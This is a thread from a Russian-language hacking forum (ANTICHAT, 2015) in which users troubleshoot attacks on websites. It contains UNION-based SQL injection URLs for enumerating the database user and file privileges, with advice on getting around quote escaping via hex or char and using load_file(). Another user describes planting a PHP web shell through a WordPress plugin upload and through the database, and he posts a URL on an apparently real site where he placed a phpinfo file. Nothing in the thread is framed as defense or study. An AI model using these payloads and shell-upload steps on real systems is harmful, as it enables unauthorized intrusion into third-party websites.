ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.02.2015, 21:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
15642
Репутация:
6
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Я то думаю, что никак. Решил уточнить
.. faza02, каким образом обойти авторизацию?
csrf например
|
|
|
|
07.02.2015, 23:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
1142
Репутация:
0
|
|
вопрос
хочю проверить наличие File_Priv
узнаю пользователя так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,user(),4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18--
получаю u1094094_sangha@дальше ip.
далле хочу узнать наличие File_Priv вот так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,file_priv, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql. user+where+user='u1094094_sangha'--
и получаю You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'u1094094_sangha\'--' at line 1 (совет учить английский не помог)
что делаю нетак?
|
|
|
|
08.02.2015, 00:06
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
экранируются кавычки. используйте hex или char
|
|
|
08.02.2015, 00:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
1142
Репутация:
0
|
|
Сообщение от faza02
faza02 said:
экранируются кавычки. используйте hex или char
как использовать char я знаю но не подошло
а как и где конвертировать hex ?
|
|
|
|
08.02.2015, 00:35
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме:
883446
Репутация:
82
|
|
Сообщение от MaxFast
MaxFast said:
Ну, вообще-то если ты загружаешь плагин - то шелл будет не в папке uploads. Скачай готовый плагин, замени файл на шелл, загрузи и иди по примерно такому пути: site.com/wp-content/plugins/название_плагина/файл_с_шеллом.php.
если грузить пхп а не зип то будет в папке аплоадс. но ето сути не меняет. не открывается так и так
как я понял сервер фильтрует евал и бас64. через простой пхп echo phpinfo(); открылось, залил через бд в корень. один фиг шел не открывается пишел соединение закрыто удаленым сервером
|
|
|
|
08.02.2015, 00:42
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от mazaxaka
mazaxaka said:
если грузить пхп а не зип то будет в папке аплоадс. но ето сути не меняет. не открывается так и так
как я понял сервер фильтрует евал и бас64. через простой пхп echo phpinfo(); открылось, залил через бд в корень. один фиг шел не открывается пишел соединение закрыто удаленым сервером
покажите phpinfo
|
|
|
|
08.02.2015, 00:45
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от izzy
izzy said:
как использовать char я знаю но не подошло
а как и где конвертировать hex ?
ошибка та же? вы уверены, что есть доступ к таблице mysql? проще проверить функцией load_file()
|
|
|
|
08.02.2015, 04:22
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от izzy
izzy said:
вопрос
хочю проверить наличие File_Priv
узнаю пользователя так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,user(),4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18--
получаю u1094094_sangha@дальше ip.
далле хочу узнать наличие File_Priv вот так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,file_priv, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql. user+where+user='u1094094_sangha'--
и получаю You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'u1094094_sangha\'--' at line 1 (совет учить английский не помог)
что делаю нетак?
Сначала проверь, есть ли доступ к mysql.user
union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+from+mysql.user
|
|
|
|
08.02.2015, 05:28
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме:
883446
Репутация:
82
|
|
Сообщение от faza02
faza02 said:
покажите phpinfo
вот
Код:
Code:
ja-zdorov.com/images/php.php
|
|
|
|
08.02.2015, 13:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
1142
Репутация:
0
|
|
Сообщение от kingbeef
kingbeef said:
Сначала проверь, есть ли доступ к mysql.user
union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+from+mysql.user
при таком +union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18+from+mysql.user--
пишет SELECT command denied to user 'u1094094_sangha'@'ип сайта' for table 'user' - это значит что нет?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
